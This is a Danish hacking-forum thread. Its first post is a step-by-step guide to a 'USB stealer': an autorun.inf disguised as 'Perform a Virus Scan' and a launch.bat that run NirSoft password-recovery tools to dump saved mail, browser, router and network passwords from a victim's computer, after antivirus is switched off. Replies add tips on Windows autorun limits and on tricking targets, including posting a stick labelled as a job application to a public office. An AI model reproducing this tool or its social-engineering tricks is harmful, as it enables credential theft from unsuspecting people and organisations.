Tråd bedømmelse:
  • 0 Stemmer - 0 Gennemsnit
  • 1
  • 2
  • 3
  • 4
  • 5
USB Stealer
03-10-2013, 10:16 (Denne besked var sidst ændret: 29-01-2014, 20:27 af Doctor Blue.)
#1
USB Stealer
Det her er en guide til at lave en Usb Stealer. (Fandt lige det på et gammel usb stik, og tænkte det vil jeg dele med jer (Y))
Målet er at få et Usb stik man bare stikker ind, også åbner du et batch fil, også har man alle Passwords og de informationer man vælger.
Det man henter er ikke FUD (Fully undetectable) Så det vil sige smider du dit usb stik i, så siger alle med et virus program at der er noget virus, også bliver de slettet
Så man skal enten Selv lave den FUD, ellers så skal man slå virus programet fra på den pågældende computer.
Jeg giver jer en "smagsprøve" på hvad man kan vælge for at få nogle stks. passwords, man kan vælge mellem en masse forskellige ting her: http://www.nirsoft.net/utils/
Efter man har hente følgende ting:
http://www.nirsoft.net/utils/mspass.html - Det er stealern til alle mail programmer.
http://www.nirsoft.net/utils/mailpv.html - OGså til mails
http://www.nirsoft.net/utils/internet_ex...sword.html internet explorer Pass stealer
http://www.nirsoft.net/utils/pspv.html - Alt microsoft pass stealer
http://www.nirsoft.net/utils/router_pass...overy.html - Gemte Password på routern
http://www.nirsoft.net/utils/network_pas...overy.html Passwords og usernames på netværket
http://www.nirsoft.net/utils/dialupass.html - Gemte netværks på Computern samt koder til netværket
http://www.nirsoft.net/utils/passwordfox.html - Firefox pass stealer
http://www.nirsoft.net/utils/chromepass.html - crome
Her er der lidt andre ting i også kan finde: http://www.nirsoft.net/password_recovery_tools.html

Du henter filerne og unpacker dem (husk at slå antivirus programmet på din computer fra) og så lig dem over på dit Usb stik, i en mappe (vi kalder mappen usb drivers)
Nu skal vi så igang med det sjove.
Åbne dit notepad
skriv følgende:

Kode:
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
Nu gemmer du så din notepad fil, som autorun.inf (husk at det altså ikke skal være.txt men .inf)
Gem din fil i mappen "usb drivers" Altså den vi lagde de andre filer ind i på usb stikket.

Når du har gjort det åbner du et nyt notepad dokoment.
skriv følgende:
Kode:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
start routerpassview.exe /stext routerpassview.txt
start netpass.exe /stext netpass.txt
start chromepass.exe /stext chromepass.exe

Så gemmer du den notepad fil som launch.bat igen husk det skal være .bat og ikke .txt
nu ligger du også launch.bat ind i mappen usb drivers, også trykker du på den der hedder lunch.bat.. så kommer der nogle .txt dokomenter hvor det hele står i.
Spørgsmål i tråden tak!
Lycia out.
Ps. Håber det går det er uden billeder da det er så nemt...
There is 3 rules for a life.
1. fuck.
2. Dont give a fuck.
3. Dont be fucked over
Find alle beskeder fra denne bruger
Citer denne besked i et svar
03-10-2013, 15:30
#2
RE: Usb hack aka. stealer
Fin guide....
Har selv lavet det en gang, om som du skriver er det jo sjovt og mest til "pranks" Men god guide! 1+
Find alle beskeder fra denne bruger
Citer denne besked i et svar
03-10-2013, 16:34
#3
RE: Usb hack aka. stealer
Det er værd at notere at Windows 7/8 ikke tillader autorun fra USB-enheder, så hvis man sigter efter Windows 7/8-maskiner kan man lige så godt lade være med at lave en autorun.inf.
Hvis det er Vista spørger den om tilladelse, hvis målet er tilstrækkeligt dum så falder de nok for den når den hedder Virus Scan.
Mangler du hjælp?
Regler |  E-mail (PGP)
Besøg denne brugers hjemmeside Find alle beskeder fra denne bruger
Citer denne besked i et svar
03-10-2013, 18:40 (Denne besked var sidst ændret: 03-10-2013, 19:02 af MalcolmXI.)
#4
RE: Usb hack aka. stealer
(03-10-2013, 16:34)Doctor Blue Skrev: Det er værd at notere at Windows 7/8 ikke tillader autorun fra USB-enheder, så hvis man sigter efter Windows 7/8-maskiner kan man lige så godt lade være med at lave en autorun.inf.
Hvis det er Vista spørger den om tilladelse, hvis målet er tilstrækkeligt dum så falder de nok for den når den hedder Virus Scan.

Han siger jo egentlig også man skal åbne launch.bat, så det er nok i de tilfælde man løber ind i en maskine der er FØR Vista.
Har da før leget med idéen om at sende et brev med et usb-stik kaldet Jobansøgning til mit lokale borgerservice. Sidst jeg var forbi kørte de XP, og processen for at lave et pas eller få et nyt kørekort tilsendt ser næsten for let ud. :P

Desuden er jeg den heldige ejer af en af de gamle SanDisk Cruzer stik, men så vidt jeg ved er det patched i W7+ og nyere Vista + XP updates.
Dog aldrig været i brug.

Edit: Kan huske jeg så en video fra Blackhat eller Defcon, hvor man ved at emulere sit USB-stik som en mus eller et keyboard kunne bypasse ikke bare de nye instillinger for autorun, men også mere sikre netværks forsøg på at blokere alle former for opagringsenheder som USB-stiks og eksterne harddiske. Hvis jeg husker rigtigt snakkede vi her rent binary det skulle kodes i. Der blev snakket om USB-stik med hardware mods samt keyboard/mus/enheders modtager der kunne hackes lidt for at tilføje mere intern plads.
Find alle beskeder fra denne bruger
Citer denne besked i et svar
03-10-2013, 19:21
#5
RE: Usb hack aka. stealer
Hehe. Jeg kan ikke huske hvilken virksomhed det var, vist en i USA, men de blev på et tidspunkt hacket,
fordi en havde samlet en usb-stick op fra jorden.
Det var en hacker som lavde lagt den der, og tænkte at personen som fandt den, ville være nysgerrig nok, til at sætte den i.
Den var smidt på virksomhendens parkeringsplads, så vidt jeg husker.
Jeg ved så ikke hva der var på. :) Men godt koncept ellers. :)
---
Writing a shellcode decoder stub in assembly is like talking gibberish in such a way that it is still perfectly intelligible. - iTick
Besøg denne brugers hjemmeside Find alle beskeder fra denne bruger
Citer denne besked i et svar
03-10-2013, 20:57
#6
RE: Usb hack aka. stealer
(03-10-2013, 19:21)iTick Skrev: Hehe. Jeg kan ikke huske hvilken virksomhed det var, vist en i USA, men de blev på et tidspunkt hacket,
fordi en havde samlet en usb-stick op fra jorden.
Det var en hacker som lavde lagt den der, og tænkte at personen som fandt den, ville være nysgerrig nok, til at sætte den i.
Den var smidt på virksomhendens parkeringsplads, så vidt jeg husker.
Jeg ved så ikke hva der var på. :) Men godt koncept ellers. :)

og selv med historier som den, kan det stadig ikke lade sig gøre for mig at forklare hende hvorfor IT-personalet på hendes arbejdsplads IKKE er idioter for at forbyde USB-nøgler. Heh, convenience over security I guess.
Mangler du hjælp?
Regler |  E-mail (PGP)
Besøg denne brugers hjemmeside Find alle beskeder fra denne bruger
Citer denne besked i et svar
03-10-2013, 21:03
#7
RE: Usb hack aka. stealer
(03-10-2013, 20:57)Doctor Blue Skrev: og selv med historier som den, kan det stadig ikke lade sig gøre for mig at forklare hende hvorfor IT-personalet på hendes arbejdsplads IKKE er idioter for at forbyde USB-nøgler. Heh, convenience over security I guess.

Det kan sagtens være.
VI brugere piver jo lidt, når noget bliver besværligt, men samtidig vil vi gerne have verdens bedste sikkerhed. Man kan bare ikke få begge dele. :)
---
Writing a shellcode decoder stub in assembly is like talking gibberish in such a way that it is still perfectly intelligible. - iTick
Besøg denne brugers hjemmeside Find alle beskeder fra denne bruger
Citer denne besked i et svar
03-10-2013, 21:04
#8
RE: Usb hack aka. stealer
(03-10-2013, 19:21)iTick Skrev: Hehe. Jeg kan ikke huske hvilken virksomhed det var, vist en i USA, men de blev på et tidspunkt hacket,
fordi en havde samlet en usb-stick op fra jorden.
Det var en hacker som lavde lagt den der, og tænkte at personen som fandt den, ville være nysgerrig nok, til at sætte den i.
Den var smidt på virksomhendens parkeringsplads, så vidt jeg husker.
Jeg ved så ikke hva der var på. :) Men godt koncept ellers. :)

Hvis jeg finder et USB-stik på jorden, så flyver det også direkte i lommen, i håb om at der er noget værdifuldt eller spændende at finde. Kan dog ikke huske om jeg nogle sinde har fundet et. Tror det desværre ikke.

Læste en artikel for nogle år siden, hvor noget med 2-5-10%(Kan ærlig talt ikke huske det præcist) af brugte stik der blev solgt indeholdt malware i den ene eller anden form. :)
Find alle beskeder fra denne bruger
Citer denne besked i et svar
03-10-2013, 21:08
#9
RE: Usb hack aka. stealer
(03-10-2013, 21:04)MalcolmXI Skrev: Hvis jeg finder et USB-stik på jorden, så flyver det også direkte i lommen, i håb om at der er noget værdifuldt eller spændende at finde. Kan dog ikke huske om jeg nogle sinde har fundet et. Tror det desværre ikke.

Læste en artikel for nogle år siden, hvor noget med 2-5-10%(Kan ærlig talt ikke huske det præcist) af brugte stik der blev solgt indeholdt malware i den ene eller anden form. :)

Jeg ville helt sikkert også kigge, men ville nok gøre det på en virtuel maskine, eller en gammel en uden netværk. :)
---
Writing a shellcode decoder stub in assembly is like talking gibberish in such a way that it is still perfectly intelligible. - iTick
Besøg denne brugers hjemmeside Find alle beskeder fra denne bruger
Citer denne besked i et svar
03-10-2013, 21:21
#10
RE: Usb hack aka. stealer
Du kan vidst finde driverne fra et usb stik... det er jo et auto run der køre der... Så Må man vel kunne lave et eller andet... Så ser det ud som om det er usbstikets driver der installeres.. Må jeg lige kigge lidt på :d
Find alle beskeder fra denne bruger
Citer denne besked i et svar
« Ældre | Nyere »




User(s) browsing this thread: 1 Gæst(er)